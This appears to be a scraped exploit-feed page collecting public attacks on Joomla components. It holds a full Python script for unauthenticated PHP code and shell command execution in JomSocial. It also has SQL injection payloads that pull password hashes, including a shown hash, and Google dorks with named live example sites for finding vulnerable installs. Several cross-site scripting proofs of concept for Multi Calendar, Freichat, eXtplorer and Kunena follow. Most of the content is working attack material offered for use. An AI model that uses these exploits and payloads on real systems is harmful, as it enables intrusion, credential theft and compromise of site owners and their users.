[2] Komento Joomla Extension - http://stackideas.com/ - Komento is a Joomla comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(91)

Joomla JomSocial component >= 2.6 PHP code execution

$
0
0
#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
#   - Matias Fontanini
#   - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior 
# authentication on the Joomla! JomSocial component.
#
# Note that in order to be able to execute PHP code, both the "eval" 
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
# 
# Execute shell commands(using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Exploit shell commands(using a user provided function, passthru in this case)
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"
 
import urllib, urllib2, re, argparse, sys, os
 
class Exploit:
    token_request_data = 'option=com_community&view=frontpage'
    exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
    json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'
 
    def __init__(self, url, user_agent = None, use_eval = True):
        self.url = url
        self._set_user_agent(user_agent)
        self.use_eval = use_eval
        self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
        self.cookie, self.token = self._retrieve_token()
        self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
        self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)
 
    def _set_user_agent(self, user_agent):
        self.user_agent = user_agent
 
    def _make_opener(self, add_cookie = True):
        opener = urllib2.build_opener()
        if add_cookie:
            opener.addheaders.append(('Cookie', self.cookie))
        opener.addheaders.append(('Referer', self.url))
        if self.user_agent:
            opener.addheaders.append(('User-Agent', self.user_agent))
        return opener
 
    def _retrieve_token(self):
        opener = self._make_opener(False)
        sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
        sys.stdout.flush()
        req = opener.open(self.url, Exploit.token_request_data)
        data = req.read()
        token = self.token_regex.findall(data)
        if len(token) < 1:
            print 'Failed'
            raise Exception("Could not retrieve anti-CSRF token")
        print 'Done'
        return (req.headers['Set-Cookie'], token[0])
 
    def _do_call_function(self, function, parameter):
        parameter = parameter.replace('"', '\\"')
        json_data = Exploit.json_data.format(function, parameter)
        json_data = urllib2.quote(json_data)
        data = Exploit.exploit_request_data.format(self.token, json_data)
        opener = self._make_opener()
        req = opener.open(self.url, data)
        if function == 'assert':
            return req.read()
        elif function in ['system', 'passthru']:
            result = self.command_regex.findall(req.read())
            if len(result) == 1:
                return result[0]
            else:
                return "[+] Error executing command."
        else:
            result = self.result_regex.findall(req.read())
            if len(result) == 1:
                return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
            else:
                return "[+] Error executing command."
 
    def call_function(self, function, parameter):
        if self.use_eval:
            return self.eval("echo {0}('{1}')".format(function, parameter))
        else:
            return self._do_call_function(function, parameter)
 
    def disabled_functions(self):
        return self.call_function("ini_get", "disable_functions")
 
    def test_injection(self):
        result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
        if 'HELLO - WORLD' in result:
            print "[+] Code injection using eval works"
        else:
            print "[+] Code injection doesn't work. Try executing shell commands."
 
    def eval(self, code):
        if code [-1] != ';':
            code = code + ';'
        return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))
 
 
 
parser = argparse.ArgumentParser(
    description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '--url', help='the base URL', required=True)
parser.add_argument(
    '-p', 
    '--php-code', 
    help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)
 
args = parser.parse_args() 
if not args.test and not args.php_code and not args.shell_command:
    print '[-] Need -p, -t or -s to do something...'
    exit(1)
url = args.url
try:
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    exploit = Exploit(url, use_eval=args.no_eval)
    if args.test:
        exploit.test_injection()
    elif args.php_code:
        code = args.php_code
        if args.php_code == '-':
            print '[i] Enter the code to be executed:'
            code = sys.stdin.read()
        elif os.path.isfile(code):
            try:
                fd = open(code)
                code = fd.read()
                fd.close()
            except Exception:
                print "[-] Error reading the file."
                exit(1)
        print '[+] Executing PHP code...'
        print exploit.eval(code)
    elif args.shell_command:
        print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
    print '[+] Error: ' + str(ex)

(48)

Joomla 3.2.1 SQL Injection

$
0
0
# Exploit Title: Joomla 3.2.1 sql injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC=>
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\
 
will cause an error:
 
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 )
 
I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful. ;-)
 
Now i can easily exploit this flaw:
 
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29
and obtain the hash:
 
1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5
 
CheerZ>

(21)

Joomla Wire Immogest SQL Injection

$
0
0
**************************************************
IIIIIIII  RRRRRRRRRRRR        HHHHHHHH    HHHHHHHH
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRRRRRRRR          HHHHHHHHHHHHHHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
IIIIIIII  RRRRRRRR    RRRRRR  HHHHHHHH    HHHHHHHH
***************************************************
 
# Exploit Title: Joomla com_wire_immogest SQL Injection vulnerabilities
 
# Google Dork: inurl:index.php?option=com_wire_immoges   or   allinurl:index.php?option=com_wire_immoges
 
# Date: 2014
 
# Exploit Author: MR.XpR
 
# Tested on: 7 , Kali
 
# CVE : OSVDB-ID: 87868
 
# Screen Shot : http://cld.persiangig.com/cfs/rest/documents/39410/preview?size=large
 
***************************************************
 
Exploit : 
 
index.php?option=com_wire_immogest&view=object&id=[sqli]
 
Injetion Demo : 
 
http://www.victim.com/index.php?option=com_wire_immogest&view=object&id=999++/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+
 
Example Site :
 
http://www.immobiliareoikia.it/index.php?option=com_wire_immogest&view=object&id=3%27
http://www.subitoecasa.it/index.php?option=com_wire_immogest&view=object&id=1163%27
 
 
***************************************************
 
TnX To :
 
MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3Z4,3is@,Mr.a!i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member
 
./IRaNHaCK.org

(118)


Joomla Multi Calendar 4.0.2 Cross Site Scripting

$
0
0
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Multi
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault
parameter to index.php.
 
File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC:
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>
 
File: /tmpl/layout_editevent.php
Line: 319
POC:
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
 
Best Regards.

(159)

Joomla Freichat Cross Site Scripting

$
0
0
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
 
 
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>
 
 
File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post" enctype="multipart/form-data">
            <label
for="file">choose file to send</label><br/><br/>
            <input id ="fromid"
type="hidden" name="fromid"/>
            <input id="fromname"
type="hidden" name="fromname"/>
            <input id="toid"
type="hidden" name="toid"/>
                                    <!--
<input id="toname" type="hidden"
name="toname"/> -->
            <input id="toname"
type="hidden" name="toname"
value="<script>alert('XSS')</script>"/>
            <input type="file"
name="file" id="file" value="a.jpeg" />
            <br /><br/>
            <input  class ="frei_upload_button"
type="submit" name="submit" value="Send" />
        </form>
        </div>
    </body></html>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
 
Best Regards.

(86)

Joomla eXtplorer 2.1.3 Cross Site Scripting

$
0
0
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string inthe URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
 
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
 
 
File: /include/copy_move.php 
Line: 158 
POC:
http://site/administrator/index.php/<img src=x
onerror=alert('XSS')
>?option=com_extplorer&tmpl=component&action=post&do_action=copy
 
File:  /include/functions.php 
Line: 933 
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/header.php
Line: 73
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/upload.php
Lines: 191 and 259
POC:
http://site/administrator/index.php/<img src=x:alert(alt)
onerror=eval(src)
alt=XSS>?option=com_extplorer&tmpl=component&action=upload
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
 
 
Best Regards.

(92)

Joomla Kunena 3.0.4 Cross Site Scripting

$
0
0
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
  [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049  function DoMap($bbcode, $action, $name, $default, $params, $content) {
  ...
1078  $document->addScriptDeclaration("
1079  // <![CDATA[
  ...
1097  var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
  ...
1112  // ]]>"
1113  );
 
Single quotes remain untouched in $content, so it's possible to break out of encapsulation.
 
 
+++ PoC Exploit
 
[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map]

(23)

Joomla Youtube Gallery 4.1.7 SQL Injection

$
0
0
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
 
Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:         if($m_themeid!=0)
49:         {
50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                    $themeid=$m_themeid;
52:              else
53:                    $themeid=JRequest::getVar('themeid');
54:              }
55:          else
56:               $themeid=JRequest::getVar('themeid');
57: }
After, $themeid and $listid are used in line 86, 92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }
 
# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

(156)

Viewing all 119 articles
Browse latest View live